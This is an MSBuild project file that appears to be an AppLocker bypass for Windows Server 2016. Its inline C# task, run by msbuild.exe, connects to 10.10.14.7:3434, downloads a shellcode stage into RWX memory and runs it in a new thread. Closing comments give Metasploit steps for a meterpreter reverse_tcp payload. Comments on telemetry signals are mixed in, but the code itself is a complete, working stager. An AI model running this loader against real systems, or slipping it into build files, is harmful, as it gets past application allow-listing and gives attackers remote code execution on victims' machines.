//Applocker bypass - Windows 2016 (Build 14393) x64
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml
//Microsoft (R) Build Engine version 4.6.1586.0
//[Microsoft .NET Framework, version 4.0.30319.42000]
//Copyright (C) Microsoft Corporation. All rights reserved.
//Build started 2/5/2019 8:55:26 PM.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<Target Name="TGaywVtZz">
<yymnTWKasHV />
</Target>
<UsingTask
TaskName="yymnTWKasHV"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
// MSBuild inline task compiled and run by CodeTaskFactory at build time. The code therefore
// executes inside msbuild.exe, a Microsoft-signed binary under %WINDIR%, which is why a
// default AppLocker publisher/path rule set admits it: the allow-list decision is made for
// the host process, not for the C# the host compiles from the project file.
// Observable behaviour of this class, in order: msbuild.exe opens an outbound TCP connection,
// receives a length-prefixed blob, places it in a PAGE_EXECUTE_READWRITE allocation and starts
// a thread at that address. Each of those steps is a distinct telemetry point (network, memory
// protection, thread start in unbacked memory) for a process that normally does none of them.
public class yymnTWKasHV : Task, ITask {
// Win32 P/Invokes. Pointer-sized arguments and the VirtualAlloc return value are declared as
// UInt32, so the class only holds together in a 32-bit process (consistent with the Framework,
// not Framework64, msbuild path in the header comment and the "Migrate -> x64" note at the end).
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 FZzLxk,UInt32 GaYMcefbEK, UInt32 GFGltjlHN, UInt32 rUfXcRhhWyT);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EEKWyVg, UInt32 DCQjzDiQ, UInt32 yUAshCNzdWWyiuX,IntPtr qcoQmEAsCYVxJN, UInt32 cwTzTaaIonmPyx, ref UInt32 NIQSzWsYXEXJ);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr ghbDXrzbbkU, UInt32 JRLCRpITaqhthxo);
// Fetches the blob over TCP: connects to host:port, reads a 4-byte little-endian length,
// then reads that many bytes into a buffer at offset 5. Returns null if the connect fails
// (the caller checks for null); every other socket failure propagates as an exception.
// The socket is never closed, so the connection stays open for as long as the process lives.
static byte[] XLiKrUiHVLg(string MWGKqRcvxKiCxsD, int WfkhTLYBl) {
IPEndPoint AljjdKQhXFar = new IPEndPoint(IPAddress.Parse(MWGKqRcvxKiCxsD), WfkhTLYBl);
Socket AOjJkaknaCLabUb = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { AOjJkaknaCLabUb.Connect(AljjdKQhXFar); }
catch { return null;}
byte[] mdoldF = new byte[4];
// Single Receive for the 4-byte length prefix; the return value (bytes actually read) is not checked.
AOjJkaknaCLabUb.Receive(mdoldF, 4, 0);
int MgAnjUozvMDSsv = BitConverter.ToInt32(mdoldF, 0);
// Five leading bytes are reserved for the header written below; the body starts at index 5.
byte[] KCEwzCyVtln = new byte[MgAnjUozvMDSsv + 5];
int fjlRsQatOOXVF = 0;
// Read the body in chunks of at most 4096 bytes until the announced length has been received.
while (fjlRsQatOOXVF < MgAnjUozvMDSsv)
{ fjlRsQatOOXVF += AOjJkaknaCLabUb.Receive(KCEwzCyVtln, fjlRsQatOOXVF + 5, (MgAnjUozvMDSsv - fjlRsQatOOXVF) < 4096 ? (MgAnjUozvMDSsv - fjlRsQatOOXVF) : 4096, 0);}
// Header: byte 0 is the constant 0xBF, bytes 1..4 are the socket handle (as a 32-bit int),
// so the received body is handed the live connection it arrived on.
byte[] HUDMCDCGhunIblU = BitConverter.GetBytes((int)AOjJkaknaCLabUb.Handle);
Array.Copy(HUDMCDCGhunIblU, 0, KCEwzCyVtln, 1, 4); KCEwzCyVtln[0] = 0xBF;
return KCEwzCyVtln;}
// Executes the buffer: VirtualAlloc(NULL, len, MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40)),
// copies the bytes in, and starts a thread whose start address is the allocation itself.
// A null argument (failed connect above) is a no-op. The RWX commit and the CreateThread
// with a start address outside any loaded module are the two memory-level signals here.
static void xxtKMgGJV(byte[] jLKRseom) {
if (jLKRseom != null) {
UInt32 XewKEzI = VirtualAlloc(0, (UInt32)jLKRseom.Length, 0x1000, 0x40);
Marshal.Copy(jLKRseom, 0, (IntPtr)(XewKEzI), jLKRseom.Length);
IntPtr FGAnYqQsIBfSRGz = IntPtr.Zero;
UInt32 APoDWpuRSVvZO = 0;
IntPtr GHFmTAQDl = IntPtr.Zero;
// lpParameter is IntPtr.Zero; the thread id written to APoDWpuRSVvZO is not used.
FGAnYqQsIBfSRGz = CreateThread(0, 0, XewKEzI, GHFmTAQDl, 0, ref APoDWpuRSVvZO);
// 0xFFFFFFFF is INFINITE: Execute() blocks here for the lifetime of the new thread, so the
// build never completes and msbuild.exe remains resident while the thread runs.
WaitForSingleObject(FGAnYqQsIBfSRGz, 0xFFFFFFFF); }}
// Task entry point invoked by MSBuild. The peer address and port are hard-coded; in network
// telemetry this is the value to pivot on (msbuild.exe as the initiating process).
// Always reports success to MSBuild, whether or not the connect succeeded.
public override bool Execute()
{
byte[] vKluxGThzSA = null; vKluxGThzSA = XLiKrUiHVLg("10.10.14.7", 3434);
xxtKMgGJV(vKluxGThzSA);
return true; } }
]]>
</Code>
</Task>
</UsingTask>
</Project>
// Migrate -> x64
// use windows/local/payload_inject
// set payload windows/x64/meterpreter/reverse_tcp